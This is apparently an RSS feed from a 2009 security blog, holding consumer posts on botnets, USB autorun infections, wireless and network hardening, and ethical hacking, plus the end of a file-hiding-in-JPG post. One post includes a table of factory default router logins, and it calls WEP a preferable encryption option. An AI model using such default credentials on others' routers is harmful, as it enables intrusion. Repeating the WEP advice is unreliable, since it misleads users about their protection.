<p><span style="font-weight: bold;">To restore the original file, rename the .jpg file to .rar and extract it using 7-zip or Winrar.</span></p>
<p>Please Note: I am not responsible for Any misuse of the information provided on this blog. This is for informational purposes only, do not be stupid!</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>

]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/15/secretly-hide-any-file-inside-jpg-image-file/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Is your PC part of a Botnet?</title>
		<link>http://techblog.cyberphunkz.com/2009/06/14/is-your-pc-part-of-a-botnet/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/14/is-your-pc-part-of-a-botnet/#comments</comments>
		<pubDate>Sat, 13 Jun 2009 19:10:45 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[botnet]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=282</guid>
		<description><![CDATA[Being part of a botnet is no fun. Your computer becomes your worst enemy, watching everything you do, collecting all of your secrets, and then delivering all that data to the bot-herder; the person who originated the network. But what does it really mean to be part of a botnet, and is there anything that can you &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/14/is-your-pc-part-of-a-botnet/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; text-align: left; padding: 0px;">Being part of a <a style="text-decoration: none; outline-style: none; outline-width: initial; outline-color: initial; color: #cc0000; padding: 0px; margin: 0px;" href="http://en.wikipedia.org/wiki/Botnet">botnet</a> is no fun. Your computer becomes your worst enemy, watching everything you do, collecting all of your secrets, and then delivering all that data to the bot-herder; the person who originated the network. But what does it really mean to be part of a botnet, and is there anything that can you do about it?</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; text-align: left; padding: 0px;">According to a report from <a href="http://tech.yahoo.com/news/ap/20090315/ap_on_hi_te/tec_inside_a_botnet">The Associated Press</a>, Internet security company <a style="text-decoration: none; outline-style: none; outline-width: initial; outline-color: initial; color: #cc0000; padding: 0px; margin: 0px;" href="http://www.prevx.com/">Prevx</a> recently discovered a Web site that was being used as a storage facility for data stolen from 160K infected computers, and the discovery offers an interesting case study.</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; text-align: left; padding: 0px;">
<p>The storage site was hosted in the Ukraine and its contents showed that the botnet was harvesting data. Information found included passwords, social security numbers, credit card numbers, addresses, telephone numbers and other personal information; quite a treasure chest if you&#8217;re into identity theft.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; text-align: left; padding: 0px;">&#8220;One Southern California 22-year-old could be seen registering a domain name with <br style="padding: 0px; margin: 0px;" />GoDaddy.com, changing his Yahoo e-mail password and ordering a meal online from Pizza Hut. His credit card number, birth date, telephone number, address and passwords are now all in criminals&#8217; hands, though it&#8217;s unclear what, if anything, criminals have done with the information yet,&#8221; the AP notes.</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; text-align: left; padding: 0px;">But it wasn&#8217;t just individuals that were targeted. According to the article, both government and bank sites had also been compromised. The Associated Press contacted one bank customer whose Social Security number and other personal details were compromised during the attack, only to learn that he hadn&#8217;t been notified by the bank.</p>
<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; text-align: left; padding: 0px;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>

<p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; text-align: left; padding: 0px;"><object id="playeridbotnets" style="padding: 0px; margin: 0px;" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="320" height="279" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="playeridbotnets" /><param name="flashvars" value="myID=playeridbotnets&amp;OmnitureServerName=symanteccom&amp;config=http://www.symantec.com/xml/player/config/config.jsp%3Fcid%3Dbotnets%26type%3Dvideos%26sg%3Dabout%26fp%3Dy%26lg%3Den%26ct%3Dus" /><param name="src" value="http://www.symantec.com/flash/mediaplayer/SMVPlayer.swf" /><param name="wmode" value="transparent" /><param name="allowfullscreen" value="true" /><param name="quality" value="high" /><embed id="playeridbotnets" style="padding: 0px; margin: 0px;" type="application/x-shockwave-flash" width="320" height="279" src="http://www.symantec.com/flash/mediaplayer/SMVPlayer.swf" quality="high" allowfullscreen="true" wmode="transparent" flashvars="myID=playeridbotnets&amp;OmnitureServerName=symanteccom&amp;config=http://www.symantec.com/xml/player/config/config.jsp%3Fcid%3Dbotnets%26type%3Dvideos%26sg%3Dabout%26fp%3Dy%26lg%3Den%26ct%3Dus" name="playeridbotnets"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/14/is-your-pc-part-of-a-botnet/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Remove Autorun Virus Infection &#8211; Solution for USB, PC &amp; Laptops</title>
		<link>http://techblog.cyberphunkz.com/2009/06/13/remove-autorun-virus-infection-solution-for-usb-pc-laptops/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/13/remove-autorun-virus-infection-solution-for-usb-pc-laptops/#comments</comments>
		<pubDate>Sat, 13 Jun 2009 16:46:46 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[autorun virus]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=276</guid>
		<description><![CDATA[Nowadays, there is a new problem that is cropping up in almost all schools,colleges, hostels etc. where the malicious Autorun Virus is Creating Havoc by spreading to Laptops and PC through USB Drives etc. How to Stop the Autorun PC Virus Infection ? The free Panda USB Vaccine allows users to vaccinate their PCs in &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/13/remove-autorun-virus-infection-solution-for-usb-pc-laptops/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Nowadays, there is a new problem that is cropping up in almost all schools,colleges, hostels etc. where the malicious Autorun Virus is Creating Havoc by spreading to Laptops and PC through USB Drives etc.</p>
<h3 style="font-weight: normal; color: #660000; font-size: 1.4em;">How to Stop the Autorun PC Virus Infection ?</h3>
<p>The free Panda USB Vaccine allows users to vaccinate their PCs in order to disable Autorun completely so that no program from any USB/CD/DVD drive (regardless of whether they have been previously vaccinated or not) can auto-execute. This is a really helpful feature as there is no user friendly and easy way of completely disabling Autorun on a Windows PC.</p>
<p style="text-align: center;"><a style="font-weight: normal; color: #990000; text-decoration: none;" href="http://1.bp.blogspot.com/_BQjFqeSjixg/ScX_TO4R_kI/AAAAAAAAAdI/n2RJlcGW_Nc/s1600-h/Remove+Autorun+Virus+Infection+-+Solution+for+USB,+PC+%26+Laptops%5B18%5D.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img id="BLOGGER_PHOTO_ID_5315935641057492546" class="aligncenter" style="background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: #f7f7f7; margin-top: 0px; margin-bottom: 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 245px; padding: 0px;" src="http://1.bp.blogspot.com/_BQjFqeSjixg/ScX_TO4R_kI/AAAAAAAAAdI/n2RJlcGW_Nc/s320/Remove+Autorun+Virus+Infection+-+Solution+for+USB,+PC+%26+Laptops%5B18%5D.jpg" border="0" alt="" width="320" height="245" /></a></p>
<p>Panda USB Vaccine is a 100% free utility. Its tested under Windows 2000 SP4, Windows XP SP1-SP3, and Windows Vista SP0 and SP1.</p>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<br />
<script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
You can download it by clicking on the following link:</p>
<p><a title="Download" href="http://www.download.com/Panda-USB-Vaccine/3000-2239_4-10909938.html" target="_self">Download</a><br />
<script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/13/remove-autorun-virus-infection-solution-for-usb-pc-laptops/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to improve your Wireless Network Security</title>
		<link>http://techblog.cyberphunkz.com/2009/06/09/how-to-improve-your-wireless-network-security/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/09/how-to-improve-your-wireless-network-security/#comments</comments>
		<pubDate>Tue, 09 Jun 2009 17:58:39 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=261</guid>
		<description><![CDATA[With the increasing number of cases regarding Wireless Network security breaches, there is need for improvement in awareness regarding security measures. Wireless network users simply need to know certain rules in order to control and prevent system penetration and bandwidth theft.   Here are a few ideas that can improve your wireless network security.   &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/09/how-to-improve-your-wireless-network-security/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>With the increasing number of cases regarding Wireless Network security breaches, there is need for improvement in awareness regarding security measures. Wireless network users simply need to know certain rules in order to control and prevent system penetration and bandwidth theft.</p>
<p> </p>
<p>Here are a few ideas that can improve your wireless network security.</p>
<p> </p>
<p><strong>Always change the password of your router as these are come with preset service identifiers</strong>. For example a D-link DI-524 router comes with a particular Ip address and a the same password. So if you are one of maybe thousands of people that have purchased this router, you have something in common. You have the same Ip Address and password for your particular router as everyone else does. If someone wanted to hack into your Wireless Network Security, it would be extremely easy. No guessing what the passwords are.</p>
<p> </p>
<p><strong>Enable encryption</strong>. Follow the encryption procedure which is provided by your routing device. Two most preferable encryption measures are WEP and WPA2; out of which the later is used most and most up to date option. The function of such technology is to encrypt traffic and scrambling it so that any unauthorized third party could not use it by throwing a spanner in order to procure sensitive details. A WEP key consists of 26 letters and numbers that help secure your network.</p>
<p><span id="more-261"></span></p>
<p><span style="font-family: Tahoma;"><span style="font-family: Tahoma; font-size: x-medium;"><strong>R</strong><strong>emote access points should be monitored closely. Security protocols must be established in companies which run web interfaces or remote system access points. It would be wise to change their passwords frequently also. These remote access points usually get forgotten in the efforts to improve your wireless network security. Sometimes they are hidden from site.</strong></span><strong> </strong></span></p>
<p><span style="font-family: Tahoma;">Avoid the use of unsecured wireless hotspots in public locations. In these places traps are set up frequently by malicious third parties. These are designed to easily gain access to your computer in order to secure your sensitive and personal details. It could be something as simple as names, addresses, emails, and phone numbers, but you never know, next it could be your bank details. Don&#8217;t get me wrong, they are not all bad, however it is a risk you take.</span></p>
<p>Use wireless security software no matter whether you are a corporation or an individual. This software uses automatic security key rotation for every three hours for encryption purposes. It also provides security to the router and also usually includes event logging. It will monitor and scrutinize for terminals that try to gain access through your wireless network security. For institutions and corporations with large wireless networks they should employ the use of advanced software systems such as Wi-Fi manager.</p>
<p>You have to take spend time implementing these wireless network security measures to safeguard your valuable information. It is not worth the risk, and why make yourself and your personal data an easy target for hackers.</p>
<p>Notes:</p>
<p>This table shows some common brands of routers and their factory Ip address and password.</p>
<p> </p>
<table id="ERE" class="dataTable" border="0" cellspacing="0" cellpadding="0" width="458">
<tbody>
<tr class="stdHeader" valign="top">
<td id="colETE" width="159"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">Router</span></span></td>
<td id="colEWE" width="143"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">Address</span></span></td>
<td id="colEZE" width="95"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">Username</span></span></td>
<td id="colE3E" width="60"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">Password</span></span></td>
</tr>
<tr class="record" valign="top">
<td width="159">
<p class="lastInCell"><span style="font-family: Tahoma;"><span style="font-family: Georgia;">Beetel</span></span></p>
</td>
<td width="143">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">http://192.168.1.1</span></span></p>
</td>
<td width="95">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">admin</span></span></p>
</td>
<td width="60">
<p class="lastInCell"><span style="font-family: Tahoma;"><span style="font-family: Georgia;">password</span></span></p>
</td>
</tr>
<tr class="evenRecord" valign="top">
<td width="159">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">D-Link</span></span></p>
</td>
<td width="143">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">http://192.168.0.1</span></span></p>
</td>
<td width="95">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">admin</span></span></p>
</td>
<td width="60">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;"><img src="http://www.tips4pc.com/images/ts.gif" border="0" alt="*" width="1" height="1" /></span></span></p>
</td>
</tr>
<tr class="record" valign="top">
<td width="159">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">Linksys</span></span></p>
</td>
<td width="143">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">http://192.168.1.1</span></span></p>
</td>
<td width="95">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">admin</span></span></p>
</td>
<td width="60">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">admin</span></span></p>
</td>
</tr>
<tr class="evenRecord" valign="top">
<td width="159">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">Microsoft Broadband</span></span></p>
</td>
<td width="143">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">http://192.168.2.1</span></span></p>
</td>
<td width="95">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">admin</span></span></p>
</td>
<td width="60">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">admin</span></span></p>
</td>
</tr>
<tr class="record" valign="top">
<td width="159">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">Netgear</span></span></p>
</td>
<td width="143">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">http://192.168.0.1</span></span></p>
</td>
<td width="95">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">admin</span></span></p>
</td>
<td width="60">
<p class="lastInCell"><span style="font-family: Tahoma; font-size: x-small;"><span style="font-family: Georgia;">password</span></span></p>
</td>
</tr>
</tbody>
</table>
<p><span style="font-family: 'Courier New'; line-height: 18px; white-space: pre;">H</span>iding the wireless SSID</p>
<p>A service set identifier (SSID ) is a name given to a wireless local area network. Another simple method of securing your network is to hide the network from unwanted users. This can be done by preventing the modem from transmitting your network name. (SSID).</p>
<p>Follow these steps to prevent your modem broadcasting your network name:</p>
<ol>
<li>Ensure your hardware is connected properly.</li>
<li>Open a web browser and in the address bar type in The IP of your router and press enter.</li>
<li>Enter the password to access the configuration page of your modem. The default password is admin , and press login.</li>
<li>Click on Advanced Setup in the top left corner of the web page. For D-link simply press Advanced</li>
<li>Click on Wireless in the menu on the left.</li>
<li>Click on Channel and SSID</li>
<li>Place a tick in the box to Disable ESSID broadcast and then save</li>
</ol>
<p>All routers have slightly different menus, for example For D-link simply press the Advanced tab and you can disable the SSID there.</p>
<p>Changing the default administrator password</p>
<p>Follow these steps to change the password on your wireless modem router.</p>
<ol>
<li>Ensure your hardware is connected properly.</li>
<li>Open a web browser and in the address bar type in http://10.1.1.1 and press enter.</li>
<li>Enter the password to access the configuration page of your modem. The default password is admin , and press login.</li>
<li>Click on Advanced Setup in the top left corner of the web page.</li>
<li>Click on System in the menu on the left.</li>
<li>Click on Password Settings and enter the current password</li>
<li>Enter a new password and click Save Settings . The password for your wireless router has now been changed.</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/09/how-to-improve-your-wireless-network-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>10 tips to improve computer network security</title>
		<link>http://techblog.cyberphunkz.com/2009/06/09/10-tips-to-improve-computer-network-security/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/09/10-tips-to-improve-computer-network-security/#comments</comments>
		<pubDate>Tue, 09 Jun 2009 17:38:26 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[10 things]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[network]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=257</guid>
		<description><![CDATA[You can&#8217;t buy security, you have to think and act secure. It&#8217;s neither difficult or costly. This list summarizes 10 tips you can use to improve the security of your information systems. Apply all security patches to software. Continuously. Harden passwords. Make users create passwords that are at least 8 characters with upper and lower &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/09/10-tips-to-improve-computer-network-security/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>You can&#8217;t buy security, you have to think and act secure. It&#8217;s neither difficult or costly. This list summarizes 10 tips you can use to improve the security of your information systems.</p>
<ol>
<li>Apply all security patches to software. Continuously.</li>
<li>Harden passwords. Make users create passwords that are at least 8 characters with upper and lower case characters, numbers and punctuations.</li>
<li>Harden systems. Turn off unnecessary services and lock down shares.</li>
<li>Harden firewall rules. Stop unnecessary outbound traffic and close unneeded ports.</li>
<li>Implement an SMTP (mail server) proxy and filter out dangerous attachments.</li>
<li>Secure VPN users with personal firewalls.</li>
<li>Audit users. Systematically go through your user accounts, and make sure people don&#8217;t have access or rights they should not have.</li>
<li>Build redundancy into your network in case of failure. Implement and test your disaster recovery plan.</li>
<li>Outsource web servers or lock them down.</li>
<li>Outsource security audits to specialised security service providers if your core business isn&#8217;t security.</li>
</ol>
<form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>

]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/09/10-tips-to-improve-computer-network-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OH NO! MY SYSTEM’S INFECTED</title>
		<link>http://techblog.cyberphunkz.com/2009/06/03/oh-no-my-system%e2%80%99s-infected/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/03/oh-no-my-system%e2%80%99s-infected/#comments</comments>
		<pubDate>Tue, 02 Jun 2009 18:45:52 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[infected]]></category>
		<category><![CDATA[lockdown]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=254</guid>
		<description><![CDATA[Hope-fully this is not the case for the majority of you, but I know there will be a few people who are going to be infected. The only way you are really going to know if you are infected is diagnosing your computer properly. I recommend getting Lockdown 2000 for this. Install it on your &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/03/oh-no-my-system%e2%80%99s-infected/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Hope-fully this is not the case for the majority of you, but I know there will be a few people who are going to be infected. The only way you are really going to know if you are infected is diagnosing your computer properly. I recommend getting Lockdown 2000 for this. Install it on your system and run a full system scan on your machine.</p>
<p>After running Lockdown 2000, run your anti virus scanner just in case Lockdown missed anything. You may ask yourself why I suggest such redundancy? Computers are built on the principle of redundancy. One program will always compensate for the short-comings of the other. This should reveal most if not all Trojans currently residing on your machine. Until you are absolutely sure about not possessing any Trojans on your machine I suggest being alert of the happenings on your computer.</p>
<p>Run the firewall programs to block out intruders.</p>
<p>Monitor your system for unusual happenings (CD Rom opening for no reason)</p>
<p>Use the Netstat command to see what ports are being used if you get suspicious</p>
<p>The ultimate goal is not to be paranoid about the use of your computer. It’s about being smart about how you use your computer.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/03/oh-no-my-system%e2%80%99s-infected/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Hacker Classes – Black hats, White Hats, Gray Hats</title>
		<link>http://techblog.cyberphunkz.com/2009/06/03/hacker-classes-%e2%80%93-black-hats-white-hats-gray-hats/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/03/hacker-classes-%e2%80%93-black-hats-white-hats-gray-hats/#comments</comments>
		<pubDate>Tue, 02 Jun 2009 18:41:36 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[black hats]]></category>
		<category><![CDATA[grey hats]]></category>
		<category><![CDATA[white hats]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=252</guid>
		<description><![CDATA[Black hats Individuals with extraordinary computing skills, resorting to malicious or destructive activities. Also known as ‘Crackers.’ White Hats Individuals professing hacker skills and using them for defensive purposes. Also known as ‘Security Analysts’. Gray Hats Individuals who work both offensively and defensively at various times. Ethical Hacker Classes Former Black Hats Reformed crackers First-hand &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/03/hacker-classes-%e2%80%93-black-hats-white-hats-gray-hats/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong>Black hats</strong></p>
<p>Individuals with extraordinary computing skills, resorting to malicious or destructive activities. Also known as ‘Crackers.’</p>
<p><strong>White Hats</strong></p>
<p>Individuals professing hacker skills and using them for defensive purposes. Also known as ‘Security Analysts’.</p>
<p><strong>Gray Hats</strong></p>
<p>Individuals who work both offensively and defensively at various times.</p>
<p><strong>Ethical Hacker Classes</strong><em></em></p>
<p><em><strong>Former Black Hats</strong></p>
<p>Reformed crackers</p>
<p>First-hand experience</p>
<p>Lesser credibility perceived</p>
<p><strong>White Hats</strong></p>
<p>Independent security consultants (maybe groups as well)</p>
<p>Claims to be knowledgeable about black hat activities</p>
<p><strong>Consulting Firms</strong></p>
<p>Part of ICT firms</p>
<p>Good credentials</p>
<p></em></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/03/hacker-classes-%e2%80%93-black-hats-white-hats-gray-hats/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What do Ethical Hackers do?</title>
		<link>http://techblog.cyberphunkz.com/2009/06/03/what-do-ethical-hackers-do/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/03/what-do-ethical-hackers-do/#comments</comments>
		<pubDate>Tue, 02 Jun 2009 18:40:12 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[ethical hacking]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=250</guid>
		<description><![CDATA[“If you know the enemy and know yourself, you need not fear the result of a hundred battles.” – Sun Tzu, Art of War Ethical hackers tries to answer: What can the intruder see on the target system? (Reconnaissance and Scanning phase of hacking) What can an intruder do with that information? (Gaining Access and &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/03/what-do-ethical-hackers-do/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>“If you know the enemy and know yourself, you need not fear the result of a hundred battles.” – Sun Tzu, Art of War</p>
<p>Ethical hackers tries to answer:</p>
<p>What can the intruder see on the target system? (Reconnaissance and Scanning phase of hacking)</p>
<p>What can an intruder do with that information? (Gaining Access and Maintaining Access phases)</p>
<p>Does anyone at the target notice the intruders attempts or success? (Reconnaissance and Covering Tracks phases)</p>
<p>If hired by any organization, an ethical hacker asks the organization what it is trying to protect, against whom and what resources it is willing to expend in order to gain protection.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/06/03/what-do-ethical-hackers-do/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>8 Tips for Working With Web Designers</title>
		<link>http://techblog.cyberphunkz.com/2009/05/15/8-tips-for-working-with-web-designers/</link>
		<comments>http://techblog.cyberphunkz.com/2009/05/15/8-tips-for-working-with-web-designers/#comments</comments>
		<pubDate>Fri, 15 May 2009 14:53:50 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Buildings]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=244</guid>
		<description><![CDATA[A lot of businesses start with less than ideal websites. A friend of a friend knows a guy who knows a girl who made a site for her brother&#8217;s band, and, well, you know the rest. But every business reaches a point where it needs a professional online appearance. Unfortunately, commissioning a website isn&#8217;t as &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/05/15/8-tips-for-working-with-web-designers/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>A lot of businesses start with less than ideal websites. A friend of a friend knows a guy who knows a girl who made a site for her brother&#8217;s band, and, well, you know the rest. But every business reaches a point where it needs a professional online appearance. Unfortunately, commissioning a website isn&#8217;t as simple as ordering office supplies. Web professionals and businesspeople don&#8217;t always speak the same language, and the learning curve for an already beleaguered entrepreneur can be steep. Here, several web designers explain how to select and collaborate with a designer to create an attractive and effective site&#8211;on time and on budget.</p>
<p><strong>1. Do your homework</strong><br />
The first step in finding a designer you like is finding designs you like. Joelle Reeder, a partner at <a href="http://www.moxiedesignstudios.com/" target="_blank">Moxie Design Studios</a>, recommends that small-business owners start by looking at the sites of their competitors and similar businesses. The key is to find a designer whose taste matches your own, she says.</p>
<p>&#8220;Ask around to friends when you&#8217;re shopping for a designer,&#8221; she says. &#8220;Don&#8217;t just go to Google and pick the first one.&#8221;</p>
<p>But taste is only one consideration, says <a href="http://www.jesseyoung.com/" target="_blank">Jesse Young</a>, an independent designer based in Seattle. Many designers specialize in creating a particular kind of site, he says. A designer whose previous work includes only small, brochure-style sites might be a poor fit for a large online store, so it&#8217;s important to consider the scope of your project as well.</p>
<p><strong>2. Know the basics<br />
</strong>Even for web professionals, keeping up with technology is difficult. Fortunately, as a small-business owner, you don&#8217;t need to know the ins and outs of the latest trends to commission a website, but it does help to understand a few fundamentals.<span id="more-244"></span></p>
